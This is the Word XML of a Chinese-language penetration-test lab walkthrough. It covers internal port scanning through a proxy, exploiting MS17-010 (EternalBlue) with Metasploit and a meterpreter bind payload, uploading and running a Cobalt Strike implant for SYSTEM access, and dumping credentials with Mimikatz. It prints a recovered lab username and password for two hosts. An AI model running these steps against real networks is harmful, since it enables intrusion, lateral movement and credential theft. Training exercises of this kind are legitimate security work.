    <w:p w14:paraId="02EE7C89" w14:textId="65D6063F" w:rsidR="00EB0E91" w:rsidRDefault="00EB0E91">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保存</w:t>
      </w:r>
      <w:r w:rsidR="00AA33E2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>退出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19706508" w14:textId="2631BADC" w:rsidR="00C276FE" w:rsidRDefault="00AC0D9A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58362A52" wp14:editId="0DAC301D">
            <wp:extent cx="5274310" cy="395605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C48B" w14:textId="77777777" w:rsidR="00F45719" w:rsidRDefault="00F45719"/>
    <w:p w14:paraId="67D6A68E" w14:textId="29FBFFEC" w:rsidR="00AA33E2" w:rsidRDefault="00AA33E2"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内网信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEB52F6" w14:textId="25C73F5D" w:rsidR="00C276FE" w:rsidRDefault="00C276FE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用proxychains代理nmap扫描内网主机端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39345787" w14:textId="1557B72A" w:rsidR="00C276FE" w:rsidRDefault="00C276FE">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启4</w:t>
      </w:r>
      <w:r>
        <w:t>45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BB8576" w14:textId="7C623CDB" w:rsidR="00F45719" w:rsidRDefault="00EB0E91">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C7E577F" wp14:editId="3D3E2F09">
            <wp:extent cx="5274310" cy="155765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32294"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="155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B8B18" w14:textId="517B1403" w:rsidR="00F768B7" w:rsidRDefault="00F768B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r w:rsidR="00C276FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>meta</w:t>
      </w:r>
      <w:r w:rsidR="00C276FE">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C276FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ploit挂上代理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD15222" w14:textId="350CE69C" w:rsidR="00F768B7" w:rsidRDefault="00F768B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF7C01E" w14:textId="73F8C2C8" w:rsidR="00F768B7" w:rsidRDefault="00F768B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>setg</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Prox</w:t>
      </w:r>
      <w:r>
        <w:t>ies socks4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.5.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:6</w:t>
      </w:r>
      <w:r>
        <w:t>5181</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFBEA23" w14:textId="6AE4B6E7" w:rsidR="00F768B7" w:rsidRDefault="00F768B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>etg ReverseAllowProxy true //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许反向代理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EDD20E" w14:textId="3A0B529F" w:rsidR="00C276FE" w:rsidRDefault="00F768B7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F6FDFBF" wp14:editId="01FBF5A4">
            <wp:extent cx="5274310" cy="36258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6CAD" w14:textId="77777777" w:rsidR="00F45719" w:rsidRDefault="00F45719"/>
    <w:p w14:paraId="2F44D3F5" w14:textId="5FC58F39" w:rsidR="00F768B7" w:rsidRDefault="00F768B7"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漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D6086" w14:textId="1E90ACE0" w:rsidR="00F768B7" w:rsidRDefault="00F768B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上面扫描端口发现开放了4</w:t>
      </w:r>
      <w:r>
        <w:t>45</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口，因此这里需要扫描是否存在ms</w:t>
      </w:r>
      <w:r>
        <w:t>17010</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>永恒之蓝漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E4384C" w14:textId="5F728D79" w:rsidR="00F768B7" w:rsidRDefault="00F768B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>aux</w:t>
      </w:r>
      <w:r>
        <w:t>iliary/scanner/smb/smb_ms17_010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AA3625" w14:textId="1151D9FF" w:rsidR="00F768B7" w:rsidRDefault="00F768B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>et rhosts 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C24D153" w14:textId="1566F998" w:rsidR="00F768B7" w:rsidRDefault="00F768B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>xploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A81F624" w14:textId="361E82F1" w:rsidR="00F768B7" w:rsidRDefault="00F768B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现有可能存在该漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B93D223" w14:textId="130B1DD0" w:rsidR="00F768B7" w:rsidRDefault="00F768B7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C837AFF" wp14:editId="59AD1D37">
            <wp:extent cx="5274310" cy="68770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4AF7" w14:textId="77777777" w:rsidR="00F45719" w:rsidRDefault="00F45719"/>
    <w:p w14:paraId="4769AFD5" w14:textId="5F9A030F" w:rsidR="00C276FE" w:rsidRDefault="00F768B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C276FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用永恒之蓝</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C662712" w14:textId="73ED13A7" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:t>use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6917F0F1" w14:textId="756992E2" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>et rhosts 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5890EBB9" w14:textId="6B86F792" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:t>set payload windows/x64/meterpreter/bind_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（目标主机不能上网，使用bind</w:t>
      </w:r>
      <w:r>
        <w:t>_tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC84396" w14:textId="3ED0B234" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>xploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67515911" w14:textId="33D73AFB" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725737A6" w14:textId="78C33EE5" w:rsidR="005833CB" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7550DD16" wp14:editId="6E70754A">
            <wp:extent cx="5274310" cy="325120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5C89" w14:textId="33D49E0A" w:rsidR="000E36E6" w:rsidRDefault="00E10ED9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>成功获取session，并得到1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机的基础信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBFC52A" w14:textId="6C139783" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入shell进入cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499263B4" w14:textId="1007C151" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3411E427" w14:textId="14E83F1D" w:rsidR="000E36E6" w:rsidRDefault="000E36E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7349AC52" wp14:editId="2C8CF6BF">
            <wp:extent cx="5274310" cy="41427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5A0E" w14:textId="77777777" w:rsidR="00F45719" w:rsidRDefault="00F45719"/>
    <w:p w14:paraId="44D65562" w14:textId="326CAA84" w:rsidR="00F768B7" w:rsidRDefault="00F768B7">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>四 获取内网主机权限、提权、信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C4C87A" w14:textId="767D096C" w:rsidR="000E36E6" w:rsidRDefault="00F45719">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E10ED9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用metasploit上传cs脚本到该主机并执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB6DDEA" w14:textId="77777777" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384D9876" w14:textId="13DEA6EF" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7289AB35" w14:textId="5A0AE6CE" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>upload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Desktop</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t>ali.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D72961E" w14:textId="21B7AC2C" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提示上传成功后</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E54DDB7" w14:textId="4F6ECB89" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进入shell界面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422BCB03" w14:textId="4F62CCB8" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBF602C" w14:textId="4C63EEF8" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kali.</w:t>
      </w:r>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D37C68" w14:textId="43ACD987" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224A2F58" w14:textId="522A0E64" w:rsidR="00E10ED9" w:rsidRDefault="00E10ED9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FD3C361" wp14:editId="325843E0">
            <wp:extent cx="3200400" cy="457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EF51" w14:textId="4DB7EC57" w:rsidR="00E10ED9" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>回到cobaltstrike，发现</w:t>
      </w:r>
      <w:r w:rsidR="00E10ED9">
        <w:t>192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidR="00E10ED9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机上线成功</w:t>
      </w:r>
      <w:r w:rsidR="00F768B7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，直接就是系统权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654EB2B8" w14:textId="5555C21E" w:rsidR="00E10ED9" w:rsidRDefault="00E10ED9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AD36830" wp14:editId="2771DBFE">
            <wp:extent cx="5104765" cy="160020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58207"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5108081" cy="1601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4CEEA" w14:textId="53122F23" w:rsidR="00E10ED9" w:rsidRDefault="00E10ED9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>获取主机的用户名密码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A403B9" w14:textId="3A2FD1FF" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B66720A" w14:textId="7288AD81" w:rsidR="005F3D4A" w:rsidRPr="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>右键上线主机，选择【执行】-</w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>【Run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Mimikat</w:t>
      </w:r>
      <w:r>
        <w:t>z</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661BCEA3" w14:textId="6DCE60FA" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="216B420B" wp14:editId="32EBC031">
            <wp:extent cx="2124075" cy="1593185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60794" cy="162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23F7" w14:textId="77777777" w:rsidR="00F45719" w:rsidRDefault="00F45719"/>
    <w:p w14:paraId="7BA7457A" w14:textId="557D814C" w:rsidR="00E10ED9" w:rsidRDefault="00E10ED9">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D63A079" w14:textId="570C03DC" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名/密码：windows</w:t>
      </w:r>
      <w:r>
        <w:t>/nsf0cus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF60355" w14:textId="601EA7AF" w:rsidR="00E10ED9" w:rsidRDefault="00E10ED9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F50C1E6" wp14:editId="56E34EAB">
            <wp:extent cx="5274310" cy="183197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C048" w14:textId="77777777" w:rsidR="00F45719" w:rsidRDefault="00F45719"/>
    <w:p w14:paraId="1313D27F" w14:textId="142E8F07" w:rsidR="00E10ED9" w:rsidRDefault="00E10ED9">
      <w:r>
        <w:t>192.168.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7758C515" w14:textId="35DF6048" w:rsidR="005F3D4A" w:rsidRDefault="005F3D4A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户名/密码：windows</w:t>
      </w:r>
      <w:r>
        <w:t>/nsf0cus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0E7817" w14:textId="44CE5F5A" w:rsidR="00E10ED9" w:rsidRDefault="00E10ED9">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5348266F" wp14:editId="1CCC1044">
            <wp:extent cx="5274310" cy="19704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DCFB" w14:textId="77777777" w:rsidR="00E10ED9" w:rsidRDefault="00E10ED9"/>
    <w:p w14:paraId="6A385624" w14:textId="77777777" w:rsidR="00E10ED9" w:rsidRPr="000E36E6" w:rsidRDefault="00E10ED9"/>
    <w:p w14:paraId="7E4B50B7" w14:textId="77777777" w:rsidR="00C276FE" w:rsidRDefault="00C276FE"/>
    <w:sectPr w:rsidR="00C276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39C"/>
    <w:rsid w:val="0005484A"/>
    <w:rsid w:val="000E36E6"/>
    <w:rsid w:val="001306F5"/>
    <w:rsid w:val="00141D43"/>
    <w:rsid w:val="002E2B10"/>
    <w:rsid w:val="003372F0"/>
    <w:rsid w:val="003E2166"/>
    <w:rsid w:val="004033CF"/>
    <w:rsid w:val="004055B3"/>
    <w:rsid w:val="005833CB"/>
    <w:rsid w:val="005F3D4A"/>
    <w:rsid w:val="0079339C"/>
    <w:rsid w:val="008A76CF"/>
    <w:rsid w:val="008D3F47"/>
    <w:rsid w:val="00981CE3"/>
    <w:rsid w:val="009B17DE"/>
    <w:rsid w:val="009E0CD1"/>
    <w:rsid w:val="00AA33E2"/>
    <w:rsid w:val="00AC0D9A"/>
    <w:rsid w:val="00C276FE"/>
    <w:rsid w:val="00CC478C"/>
    <w:rsid w:val="00E10ED9"/>
    <w:rsid w:val="00EB0E91"/>
    <w:rsid w:val="00F23E98"/>
    <w:rsid w:val="00F45719"/>
    <w:rsid w:val="00F76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051CD"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{8B5847FD-823C-4757-931D-C400B9D3B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</TotalTime>
  <Pages>14</Pages>
  <Words>279</Words>
  <Characters>1595</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>13</Lines>
  <Paragraphs>3</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1871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知 夏</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>知 夏</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-12T02:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-13T09:10:00Z</dcterms:modified>
</cp:coreProperties>
</file>